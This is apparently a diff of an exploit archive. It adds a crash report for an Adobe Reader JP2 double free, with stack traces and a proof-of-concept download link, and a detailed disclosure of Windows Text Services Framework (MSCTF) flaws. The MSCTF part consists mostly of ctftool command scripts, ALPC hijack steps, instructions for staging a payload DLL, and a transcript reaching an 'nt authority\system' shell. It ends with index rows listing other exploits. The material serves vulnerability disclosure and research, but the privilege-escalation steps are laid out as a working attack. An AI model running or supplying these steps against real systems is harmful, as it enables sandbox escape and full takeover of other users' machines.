eax=66e603a0 ebx=00000000 ecx=000001a1 edx=0536c661 esi=66e5dd88 edi=0c441000
eip=66e53ae6 esp=0536c948 ebp=0536cb5c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
vrfcore!VerifierStopMessageEx+0x5b6:
66e53ae6 cc int 3
0:000> kb
# ChildEBP RetAddr Args to Child
00 0536cb5c 66e58038 66e5d258 00000007 0c441000 vrfcore!VerifierStopMessageEx+0x5b6
01 0536cb80 66d6da5e 00000007 66d61cbc 0c441000 vrfcore!VfCoreRedirectedStopMessage+0x88
02 0536cbd8 66d6b8a8 00000007 66d61cbc 0c441000 verifier!VerifierStopMessage+0x8e
03 0536cc44 66d6bdea 0c441000 00000004 147e6638 verifier!AVrfpDphReportCorruptedBlock+0x1b8
04 0536cca0 66d6c302 0c441000 147e6638 00000004 verifier!AVrfpDphCheckNormalHeapBlock+0x11a
05 0536ccc0 66d6ab43 0c441000 0c640000 01000002 verifier!AVrfpDphNormalHeapFree+0x22
06 0536cce4 77305359 0c440000 01000002 147e6638 verifier!AVrfDebugPageHeapFree+0xe3
07 0536cd54 7725ad86 147e6638 ab70558b 00000000 ntdll!RtlDebugFreeHeap+0x3c
08 0536ceb0 7725ac3d 00000000 147e6638 00000000 ntdll!RtlpFreeHeap+0xd6
09 0536cf04 66e5aad0 0c440000 00000000 147e6638 ntdll!RtlFreeHeap+0x7cd
0a 0536cf20 74a2db1b 0c440000 00000000 147e6638 vrfcore!VfCoreRtlFreeHeap+0x20
0b 0536cf34 74a2dae8 147e6638 00000000 0536cf54 ucrtbase!_free_base+0x1b
0c 0536cf44 0f012849 147e6638 16fd32f8 0536d068 ucrtbase!free+0x18
WARNING: Stack unwind information not available. Following frames may be wrong.
0d 0536cf54 0f6d6441 147e6638 31577737 0536d0b8 AcroRd32!AcroWinMainSandbox+0x6a49
0e 0536d068 0f6c20a4 0536d0d8 00000001 00000b20 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18bb1
0f 0536d230 0f6bf15d 00000000 00000000 00000000 AcroRd32!CTJPEGTiledContentWriter::operator=+0x4814
10 0536d264 0f6b209f 1771f6b4 1771f6b4 194f9078 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18cd
11 0536d278 0f6a5007 194f9078 000033f8 2037a088 AcroRd32!AX_PDXlateToHostEx+0x34404f
12 0536d32c 0f0a57c9 1771f6b4 19053d28 0f0a5730 AcroRd32!AX_PDXlateToHostEx+0x336fb7
13 0536d350 0f0a56c3 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x4c809
14 0536d370 0f02e7e1 0536d390 1cb80970 0013d690 AcroRd32!DllCanUnloadNow+0x4c703
15 0536d398 0f02e78d 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x229e1
16 0536d3ac 0f0e8a5b 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x2298d
17 0536d3c8 0f1f4315 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x8fa9b
18 0536d42c 0f6568a8 00000000 00000e44 205378ac AcroRd32!CTJPEGDecoderHasMoreTiles+0x1a15
19 0536d4ac 0f56ae8d 0536d4cc 0536d4dc 315773af AcroRd32!AX_PDXlateToHostEx+0x2e8858
1a 0536d4f0 10d5da8c 17b908d0 0536d55c bb3e57b9 AcroRd32!AX_PDXlateToHostEx+0x1fce3d
1b 0536d56c 10d5e053 0536d5b8 bb3e5771 00000000 AGM!AGMGetVersion+0x16e3c
1c 0536d5a4 10fffb4c 193d706c 0536d5b8 fffffff9 AGM!AGMGetVersion+0x17403
1d 0536d5bc 10cd9a32 0536d650 bb3e5855 17c76ff8 AGM!AGMGetVersion+0x2b8efc
1e 0536da80 10cd75d6 0536df90 17c76ff8 0536df04 AGM!AGMInitialize+0x40c02
1f 0536df24 10cd4133 0536df90 17c76ff8 0536e124 AGM!AGMInitialize+0x3e7a6
20 0536e144 10cd2370 19891678 18f911e8 17c616f8 AGM!AGMInitialize+0x3b303
21 0536e320 10cd0dec 19891678 18f911e8 bb3e61b9 AGM!AGMInitialize+0x39540
22 0536e36c 10cfffbf 19891678 18f911e8 17150de0 AGM!AGMInitialize+0x37fbc
23 0536e398 10cffb7f 18f911e8 bb3e66d1 17150de0 AGM!AGMInitialize+0x6718f
24 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66d4f
0:000> !heap -p -a 147E6638
address 147e6638 found in
_HEAP @ c640000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
147e6610 0009 0000 [00] 147e6638 00010 - (free DelayedFree)
66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6
66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3
77305359 ntdll!RtlDebugFreeHeap+0x0000003c
7725ad86 ntdll!RtlpFreeHeap+0x000000d6
7725ac3d ntdll!RtlFreeHeap+0x000007cd
66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020
74a2db1b ucrtbase!_free_base+0x0000001b
74a2dae8 ucrtbase!free+0x00000018
f012849 AcroRd32!AcroWinMainSandbox+0x00006a49
f6d6430 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00018ba0
f6c20a4 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00004814
f6bf15d AcroRd32!CTJPEGTiledContentWriter::operator=+0x000018cd
f6b209f AcroRd32!AX_PDXlateToHostEx+0x0034404f
f6a5007 AcroRd32!AX_PDXlateToHostEx+0x00336fb7
f0a57c9 AcroRd32!DllCanUnloadNow+0x0004c809
f0a56c3 AcroRd32!DllCanUnloadNow+0x0004c703
f02e7e1 AcroRd32!AcroWinMainSandbox+0x000229e1
f02e78d AcroRd32!AcroWinMainSandbox+0x0002298d
f0e8a5b AcroRd32!DllCanUnloadNow+0x0008fa9b
f1f4315 AcroRd32!CTJPEGDecoderHasMoreTiles+0x00001a15
f6568a8 AcroRd32!AX_PDXlateToHostEx+0x002e8858
f56ae8d AcroRd32!AX_PDXlateToHostEx+0x001fce3d
10d5da8c AGM!AGMGetVersion+0x00016e3c
10d5e053 AGM!AGMGetVersion+0x00017403
10fffb4c AGM!AGMGetVersion+0x002b8efc
10cd9a32 AGM!AGMInitialize+0x00040c02
10cd75d6 AGM!AGMInitialize+0x0003e7a6
10cd4133 AGM!AGMInitialize+0x0003b303
10cd2370 AGM!AGMInitialize+0x00039540
10cd0dec AGM!AGMInitialize+0x00037fbc
10cfffbf AGM!AGMInitialize+0x0006718f
--- cut ---
Notes:
- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option enabled in Application Verifier.
- The crash occurs immediately after opening the PDF document.
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x172b4, which appears to reside inside a binary JP2 image stream. It was modified from 0x1C to 0xFF.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47279.zip

356
exploits/windows/local/47258.txt Normal file
View file

@ -0,0 +1,356 @@
The msctf subsystem is part of the Text Services Framework, The TSF manages things like input methods, keyboard layouts, text processing and so on. There are two main components, the ctfmon server and the msctf client.
The ctfmon service creates an ALPC port in a well known location, to which clients connect and exchange messages. When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client.
The CTF subsystem is vast and complex. It was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system.
There are multiple critical design flaws in this system, I've written a detailed technical analysis and an interactive utility to probe the CTF subsystem.
$ ./ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help
Type `help <command>` for help with a specific command.
Any line beginning with # is considered a comment.
help - List available commands.
exit - Exit the shell.
connect - Connect to CTF ALPC Port.
info - Query server informaiton.
scan - Enumerate connected clients.
callstub - Ask a client to invoke a function.
createstub - Ask a client to instantiate CLSID.
hijack - Attempt to hijack an ALPC server path.
sendinput - Send keystrokes to thread.
setarg - Marshal a parameter.
getarg - Unmarshal a parameter.
wait - Wait for a process and set it as the default thread.
thread - Set the default thread.
sleep - Sleep for specified milliseconds.
forget - Forget all known stubs.
stack - Print the last leaked stack ptr.
marshal - Send command with marshalled parameters.
proxy - Send command with proxy parameters.
call - Send command without appended data.
window - Create and register a message window.
patch - Patch a marshalled parameter.
module - Print the base address of a module.
module64 - Print the base address of a 64bit module.
editarg - Change the type of a marshalled parameter.
symbol - Lookup a symbol offset from ImageBase.
set - Change or dump various ctftool parameters.
show - Show the value of special variables you can use.
lock - Lock the workstation, switch to Winlogon desktop.
repeat - Repeat a command multiple times.
run - Run a command.
script - Source a script file.
print - Print a string.
consent - Invoke the UAC consent dialog.
reg - Lookup a DWORD in the registry.
Most commands require a connection, see "help connect".
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000248
ctf> info
The server responded.
000000: 20 00 38 00 02 10 00 00 ec 04 00 00 a4 1a 00 00 .8.............
000010: dc b6 00 00 35 1b 2e 00 38 00 00 00 20 2a 00 00 ....5...8... *..
000020: 00 00 00 00 00 00 00 00 ec 04 00 00 00 00 00 00 ................
000030: 00 00 00 00 00 00 00 00 ........
Monitor PID: 1260
ctf>
Please see the attached document for a detailed analysis, but here are my major concerns with the service:
1. The ctfmon ALPC port is accessible across sessions, allowing users to compromise other users of the system.
2. UIPI can be bypassed, sending input events to higher integrity windows. This is an AppContainer or IL sandbox escape.
3. The msctf client disables UIPI for Marshal event windows. As far as I can tell, this is unnecessary, only ctfmon should be sending these messages, which is already high integrity.
4. The MSG_CALLSTUB command does not validate the command index, allowing arbitrary code execution.
4a. Frankly, even if you call a legitimate stub, youre often trusted to Marshal pointers across the interface.
Many of the legitimate functions expect pointers with no validation (For example, CInputProcessorProfiles::Register, which is called via CStubITfInputProcessorProfileMgr::stub_ActivateProfile, FunctionIndex 3 for TfInputProcessorProfileMgr)
5. There is no mutual authentication of Servers or Clients, therefore:
5a. You can hijack the alpc server path for other sessions and wait for clients to connect to you, then send them input.
5b. You can lie about your ThreadId, ProcessId and HWND, effectively redirecting messages from other clients.
I'm planning to write a full SYSTEM exploit for these issues, because I think it's interesting and I've already invested a ton of work to get the tool working to make a PoC :)
I assume you'll want a copy when it's finished.
Interfering with processes across sessions
------------------------------------------
To reproduce, follow these steps:
* Login as an Administrator to Session 1.
* Please make sure that you do not have an open copy of notepad.
* Use Fast User Switching (i.e. Ctrl-Alt-Del, Switch User) to create an unprivileged standard user session.
* Create a file containing these commands:
connect Default 1
Sleep 10000
wait notepad.exe
createstub 0 4 IID_ITfInputProcessorProfileMgr
setarg 6
setarg 0x201 0x41414141
setarg 0x20001 0x41414142
setarg 0x1 ABABABAB-ABAB-ABAB-ABAB-ABABABABABAB
setarg 0x1 BCBCBCBC-BCBC-BCBC-BCBC-BCBCBCBCBCBC
setarg 0x10001 0x41414145
setarg 0x201 0x41414146
callstub 0 0 3
quit
Run the following command:
PS Z:\Home> cat .\script.txt | .\ctftool.exe
* Use fast user switching to return to Session 1.
* Run windbg -c g notepad.exe
* Wait 10 seconds, observe that notepad dereferences 0x41414141.
This proves that an unprivileged user can interact with processes on a privileged session.
UIPI can be bypassed, sending input events to higher integrity windows.
-----------------------------------------------------------------------
Use the following command to make ctftool.exe Low Integrity:
> icacls ctftool.exe /setintegritylevel low
Observe that the tool can still connect, scan, and interact with Windows.
The msctf client disables UIPI for Marshal event windows.
---------------------------------------------------------
msctf!SYSTHREAD::LockThreadMessageWindow allows Marshal messages across integrity levels, I suspect this is a bug and unnecessary.
The MSG_CALLSTUB command does not validate the command index.
-------------------------------------------------------------
This is the (decompiled) code that handles MSG_CALLSTUB (Command 0xA, I just guessed the name):
// Get pointer to appended Data
ProxyInfo = MsgBase::GetProxyInfoPtr(*MessagePtr);
if ( ProxyInfo )
{
ms_exc.registration.TryLevel = 0;
Systhread = this->Systhread;
if ( Systhread->StubArray )
{
FoundStub = 0;
FindStub(Systhread->StubArray, ProxyInfo->StubId, &FoundStub);
if ( FoundStub )
{
if ( FoundStub->TimeStamp == ProxyInfo->TimeStamp )
Result = FoundStub->vtbl->invoke(FoundStub, ProxyInfo->FunctionIndex, MessagePtr);
}
}
ms_exc.registration.TryLevel = -2;
}
return Result;
Here, MessagePtr and ProxyInfo are entirely untrusted data, but that is then used to call an arbitrary index from a table, and the invoke method looks like this:
int __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this, unsigned int FunctionIndex, struct MsgBase **Msg)
{
return (*(&CStubITfCompartment::_StubTbl + FunctionIndex))(this, Msg);
}
(All the Invoke functions look similar)
Reproduce like this:
PS Z:\Home> .\ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
ctf> scan
Client 0, Tid 3976 (Flags 0x08, Hwnd 00000F88, Pid 4012, explorer.exe)
Client 1, Tid 780 (Flags 0x08, Hwnd 0000030C, Pid 4012, explorer.exe)
Client 2, Tid 692 (Flags 0x08, Hwnd 000002B4, Pid 4012, explorer.exe)
Client 3, Tid 4420 (Flags 0x0c, Hwnd 00001144, Pid 4352, SearchUI.exe)
Client 4, Tid 7964 (Flags 0x08, Hwnd 00001F1C, Pid 7920, conhost.exe)
Client 5, Tid 7116 (Flags 0x08, Hwnd 00001BCC, Pid 7112, procexp.exe)
Client 6, Tid 9616 (Flags 0000, Hwnd 00002590, Pid 2096, ctfmon.exe)
Client 7, Tid 9048 (Flags 0x08, Hwnd 00002358, Pid 11660, windbg.exe)
Client 8, Tid 1020 (Flags 0x08, Hwnd 000003FC, Pid 4652, notepad.exe)
Client 9, Tid 11620 (Flags 0000, Hwnd 00002D64, Pid 3776, ctftool.exe)
ctf> createstub 1020 4 IID_ITfInputProcessorProfileMgr
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 00CAA4B0, Type 0x106, Size 0x18, Offset 0x40)
000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c L..q(....*..[.C\
000010: 01 00 00 00 33 01 61 12 ....3.a.
Marshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x12610133
ctf> setarg 6
New Parameter Chain, Length 6
ctf> setarg 0x201 0x41414141
Marshalled Value 0, INT 0000000041414141
ctf> setarg 0x201 0x41414146
Marshalled Value 1, INT 0000000041414146
ctf> setarg 0x201 0x41414146
Marshalled Value 2, INT 0000000041414146
ctf> setarg 0x201 0x41414146
Marshalled Value 3, INT 0000000041414146
ctf> setarg 0x201 0x41414146
Marshalled Value 4, INT 0000000041414146
ctf> setarg 0x201 0x41414146
Marshalled Value 5, INT 0000000041414146
ctf> callstub 0 0 0xffff
Sending the Proxy data failed, 0x80004005
ctf> q
There is no mutual authentication of clients and servers.
----------------------------------------------------------
To reproduce this issue, as an unprivileged session use the command `hijack` to create a new ALPC server, then create a privileged session.
For example, `hijack Default 2`, to hijack the server for session 2 on the default desktop.
When the new session is created, the tool will dump information as new privileged clients attempt to connect to the fake service.
PS: Z:\Home> .\ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
ctf> hijack Default 1
NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D...
000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D...
000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ...
A a message received
ProcessID: 4352, SearchUI.exe
ThreadId: 4420
WindowID: 00020180
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........
000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00 .y...f..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00 ................
A a message received
ProcessID: 4012, explorer.exe
ThreadId: 780
WindowID: 00010110
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........
000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00 ....*g..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00 ............X...
A a message received
ProcessID: 4012, explorer.exe
ThreadId: 780
...
Notes on the tool
-----------------
* I have only tested it on Windows 10.
* The tool is interactive and uses readline, type help for a list of commands.
* You can have the source if you like, please let me know.
* The tool is unfinished, I plan to make a full working exploit but wanted to get the ball rolling on disclosure.
The code has been tested with latest Win10 x64 as of 05/21, but I had to hardcode some offsets.
In particular, I have msctf.dll 10.0.17763.348 and kernelbase.dll 10.0.17763.475 (I think those are the only two relevant modules).
1. As an unprivileged user, execute `query user` to see all the others users on the system.
2. Open ctfmonexploit.ctf in notepad, and set the connect line to the sessionid you want to compromise.
3. Copy the exploit payload dll into c:\Windows\Temp, call it exploit.dll.
4. Run `icacls c:\Windows\Temp\exploit.dll /grant "Everyone:(RX)"`
5. Run `cat ctfmonexploit.ctf | .\ctftool.exe`
6. The dll is loaded into a High Integrity process of the specified session when the session is next active.
I got this attack working from unprivileged user to SYSTEM, even from LPAC.
The trick is to switch to the WinLogon desktop, which an unprivileged user can do using USER32!LockWorkstation().
PS Z:\Home\Documents\Projects\alpc> .\ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> connect Winlogon 1
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0xc0000034
Waiting for the specified port to appear...
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 00000224
ctf> scan
Client 0, Tid 6324 (Flags 0000, Hwnd 000018B4, Pid 4020, ctftool.exe)
Client 1, Tid 4656 (Flags 0x1000000c, Hwnd 00001230, Pid 2336, LogonUI.exe)
Client 2, Tid 8692 (Flags 0x1000000c, Hwnd 000021F4, Pid 2336, LogonUI.exe)
Client 3, Tid 4808 (Flags 0x10000008, Hwnd 000012C8, Pid 4440, TabTip.exe)
Client 4, Tid 8800 (Flags 0x1000000c, Hwnd 00002260, Pid 8536, Utilman.exe)
Client 5, Tid 6788 (Flags 0x10000008, Hwnd 00001A84, Pid 6628, osk.exe)
I finished the exploit, it reliably gets NT AUTHORITY\SYSTEM from an unprivileged user on up-to-date Windows 10 1903.
I sent Microsoft a finished version.
Here is the current source code, and a video demonstrating it. I think the best targets are either logonui.exe or consent.exe, both run as SYSTEM.
https://www.youtube.com/watch?v=JUbac3OLPaM
$ ./ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> script .\scripts\ctf-consent-system.ctf
Attempting to copy exploit payload...
1 file(s) copied.
Right click something and select "Run as Administrator", then wait for a SYSTEM shell...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 00000244
Waiting for the consent dialog to join the session...
Found new client consent.exe, DefaultThread now 6900
consent.exe has joined the session, starting exploit...
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 011E89C0, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\
000010: 01 00 00 00 6c 4a af 03 ....lJ..
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x3af4a6c
0x7ff8cf290000
0x7ff8cf340000
0x7ff8cffe0000
0x7ff8cf340000
Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL
C:\WINDOWS\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1eb60
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ff8cfc40000
Payload created and call chain ready, get ready...
C:\WINDOWS\system32>whoami
nt authority\system
If you have an input profile with enhanced capabilities available (in general, if you use an IME then you do - Chinese, Korean, Japanese, etc.), then a low privileged application on the same session can read and write data to a higher privileged application.
The user doesn't need to have the language selected, because a CTF client can change active profile too, but it does have to be installed.
The problem with this is that a low privileged application can take control of an elevated command prompt, escape a low-integrity sandbox, escape AppContainer/LPAC, read passwords out of login dialogs/consent dialogs, and so on.
This means UIPI basically doesn't work any more.
I've attached a ctf script that will wait for you to open notepad, and then write some text into it. Here is a screenshot of a low privileged ctftool typing into an Administrator console.
Please note, if you *only* have languages installed that doesn't use an Out-of-process TIP (English, German, French, Polish, etc), you are likely unaffected (or at least, I don't know how to exploit it yet). Right now, it's mostly users in Asia affected by this, but I'm admittedly ignorant about i18n and a11y.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47258.zip

23
files_exploits.csv
View file

@ -6527,6 +6527,28 @@ id,file,description,date,author,type,platform,port
47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple, 47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows, 47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux, 47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
47257,exploits/multiple/dos/47257.txt,"NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String",2019-08-15,"Google Security Research",dos,multiple,
47259,exploits/windows/dos/47259.txt,"Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators",2019-08-15,"Google Security Research",dos,windows,
47260,exploits/windows/dos/47260.txt,"Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts",2019-08-15,"Google Security Research",dos,windows,
47261,exploits/windows/dos/47261.txt,"Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage",2019-08-15,"Google Security Research",dos,windows,
47262,exploits/windows/dos/47262.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx",2019-08-15,"Google Security Research",dos,windows,
47263,exploits/windows/dos/47263.txt,"Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList",2019-08-15,"Google Security Research",dos,windows,
47264,exploits/windows/dos/47264.txt,"Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables",2019-08-15,"Google Security Research",dos,windows,
47265,exploits/windows/dos/47265.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure",2019-08-15,"Google Security Research",dos,windows,
47266,exploits/windows/dos/47266.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList",2019-08-15,"Google Security Research",dos,windows,
47267,exploits/windows/dos/47267.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure",2019-08-15,"Google Security Research",dos,windows,
47268,exploits/windows/dos/47268.txt,"Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList",2019-08-15,"Google Security Research",dos,windows,
47269,exploits/windows/dos/47269.txt,"Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1",2019-08-15,"Google Security Research",dos,windows,
47270,exploits/windows/dos/47270.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
47271,exploits/windows/dos/47271.txt,"Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
47272,exploits/windows/dos/47272.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF",2019-08-15,"Google Security Research",dos,windows,
47273,exploits/windows/dos/47273.txt,"Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream",2019-08-15,"Google Security Research",dos,windows,
47274,exploits/windows/dos/47274.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream",2019-08-15,"Google Security Research",dos,windows,
47275,exploits/windows/dos/47275.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll",2019-08-15,"Google Security Research",dos,windows,
47276,exploits/windows/dos/47276.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font",2019-08-15,"Google Security Research",dos,windows,
47277,exploits/windows/dos/47277.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10635,6 +10657,7 @@ id,file,description,date,author,type,platform,port
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux, 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows, 47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.